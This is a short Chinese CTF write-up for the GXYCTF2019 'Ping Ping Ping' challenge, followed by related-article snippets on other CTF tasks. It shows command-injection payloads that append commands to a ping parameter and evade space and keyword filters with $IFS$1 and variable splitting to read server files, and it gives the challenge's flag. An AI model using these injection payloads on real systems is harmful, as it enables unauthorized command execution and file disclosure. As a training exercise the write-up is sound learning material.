首页 > 其他分享 >CTF练习日记——[GXYCTF2019]Ping Ping Ping 1

CTF练习日记——[GXYCTF2019]Ping Ping Ping 1

时间:2024-03-15 18:34:00浏览次数:19  
标签:127.0 0.1 ip Ping CTF flag php GXYCTF2019

首先尝试一下分号有没有被过滤:?ip=127.0.0.1;ls;

可以看见分号没有被过滤,看到了flag.php和index.php两个文件,先尝试能不能打开flag.php:?ip=127.0.0.1;cat flag.php;

能看出空格被过滤了,我们用$IFS$1绕过空格:?ip=127.0.0.1;cat$IFS$1flag.php;

可以看见flag也被过滤了,我们打开index.php看看:?ip=127.0.0.1;cat$IFS$1index.php;

发现可以利用变量a来绕过flag的过滤:?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

发现什么都没有,但没有失败提示,试试打开页面源码

成功获取flag:flag = "flag{3874c359-41b9-4f7e-bdfa-c25ee4bae813}

标签:127.0,0.1,ip,Ping,CTF,flag,php,GXYCTF2019
From: https://www.cnblogs.com/Evan66/p/18076024

相关文章

  • ctfshow 杂项
    杂项签到:文件伪加密:确定是文件伪加密后就需要将其修改为无加密,方法很简单,就是将压缩源文件目录区的全局方式位标记(504B01 02 1400)后从0900改为0000。另一种方法,用zipcenop,将压缩包与其放在同一目录下,然后用cmd进入该目录,执行java-jarZipCenOp.jarr压缩包名称.z......
  • CTF笔记——[GXYCTF2019]禁止套娃 1
    [GXYCTF2019]禁止套娃1打开题目之后什么都没看到所以进行常规的检测漏洞,扫描目录发现存在.git文件夹下的文件存在#DirsearchstartedSunMar1015:19:392024as:D:\Python\Scripts\dirsearch-uhttp://849b4a98-3df3-4abb-927e-1a358a178e30.node5.buuoj.cn:81/-x429......
  • BJDCTF2020[encode]
    题目:encode,地址:encode查壳发现时upx壳,使用工具脱壳命令"upx-d",如果遇到工具脱不了的壳就手动脱壳,手动脱壳请帅哥美女*们看这篇手动脱壳。使用ida打开,观察逻辑后重命名函数:逻辑为一个换表base64+异或+RC4。其中RC4可以根据函数传入key,进而生成Box盒子来判断:知道逻辑后......
  • CTF练习日记——[HCTF 2018]WarmUp 1
    一点进去就是一个大大的笑脸,暂时没有头绪,点开页面源码试试看发现了一个source.php,从这里入手试试呢能看到在source.php中有许多的if语句,猜测适用于验证过滤啥的,但看的不是太懂,一个个分析下先这里isset()验证变量是否声明,is_string判断是否是字符串,只要有一个不符合,就会输出......
  • CTF练习日记——[极客大挑战 2019]EasySQL
    启动靶机后,首先能看到这样一个界面:这个题是和SQL注入相关,首先随意输入username和password试试看:提示用户名和密码错误,那么我们尝试输入用户名输入1',得到提示SQL语句出错,那么我们就可以从这里下手,直接在用户名那输入1'or'1'='1#注入成功,得到了我们需要的flag:flag{08f72......
  • CTF练习日记——[极客大挑战 2019]Havefun 1
    开启靶机后,看到该界面,一只可爱的小猫,题目也没有更多信息,查看源代码试试看我们可以看到这样一段代码,我们试试cat=dog,发现结果自己出来了,得到了flag:flag{4962ffca-1564-415b-b9e0-77699a797784}......
  • PING命令 获取的TTL值 注册表位置
    对TTL进行伪装或隐藏是一种网络欺骗技术,通常用于隐匿数据包的传输路径或减少网络攻击的暴露。以下是一种可能的方法和基础技术原理:使用代理服务器:通过设置代理服务器来修改数据包的TTL值,然后再将其发送到目标服务器。代理服务器会在转发数据包时更改TTL的值,使得接收方无......
  • 【图像拼接/视频拼接】论文精读:Eliminating Warping Shakes for Unsupervised Online
    第一次来请先看这篇文章:【图像拼接(ImageStitching)】关于【图像拼接论文精读】专栏的相关说明,包含专栏使用说明、创新思路分享等(不定期更新)图像拼接系列相关论文精读SeamCarvingforContent-AwareImageResizingAs-Rigid-As-PossibleShapeManipulationAdaptiveAs......
  • CTF学习的第二天
    完成了CTFHUB中web前置技能剩下的两道题web前置技能-HTTP协议4.基础认证在这道题中,打开靶机看题目意思,有一个可以点击的click选项,正常思路点了一下,出来了一个登陆界面,先尝试了一下admin并不正确尝试用bp抓包,发现了一串Base64编码复制一下去解密看看发现admin中间有一个:......
  • [BJDCTF2020]Easy MD5 1
    [BJDCTF2020]EasyMD51审题看到一个登录框,并且题目为ezMD5,猜测使用md5绕过SQL知识点md5的绕过解题使用ffifdyop绕过SQL查看源代码弱比较绕过输入?a[]=1&b[]=2发现为===强比较,由于md5对数组不敏感也可以使用数组绕过,这是md5的另一个特性,就是md5无法对数组进行......